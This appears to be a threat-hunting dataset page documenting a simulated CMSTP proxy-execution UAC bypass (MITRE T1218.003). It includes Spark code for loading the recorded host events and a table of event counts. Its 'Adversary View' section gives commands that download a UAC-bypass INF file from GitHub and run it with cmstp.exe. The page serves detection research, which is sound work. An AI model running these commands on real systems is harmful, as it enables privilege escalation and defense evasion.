CMSTP Proxy Execution¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/10/22 |
Modification Date |
2020/10/22 |
Tactics |
[‘TA0005’] |
Techniques |
[‘T1218.003’] |
Tags |
[‘art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0’] |
Dataset Description¶
This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). (Embedding commands in the RunPreSetupCommandsSection of the INF file).
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
Simulation Plan¶
Environment |
Tool Type |
Module |
---|---|---|
Lab VM |
Manual |
Adversary View¶
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile C:\ProgramData\T1218.003_uacbypass.inf
cmstp.exe /s C:\ProgramData\T1218.003_uacbypass.inf /au
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10 |271 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|22 |205 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7 |185 |
|WORKSTATION5|Security |4673 |170 |
|WORKSTATION5|Security |4658 |78 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12 |51 |
|WORKSTATION5|Security |4690 |39 |
|WORKSTATION5|Security |4656 |39 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13 |39 |
|WORKSTATION5|Security |4663 |38 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11 |12 |
|WORKSTATION5|Security |5158 |7 |
|WORKSTATION5|Security |5156 |7 |
|WORKSTATION5|Security |4688 |5 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1 |5 |
|WORKSTATION5|Security |4703 |4 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|9 |3 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|3 |2 |
|WORKSTATION5|Security |4689 |2 |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|5 |2 |
+------------+------------------------------------+-------+-----+
only showing top 20 rows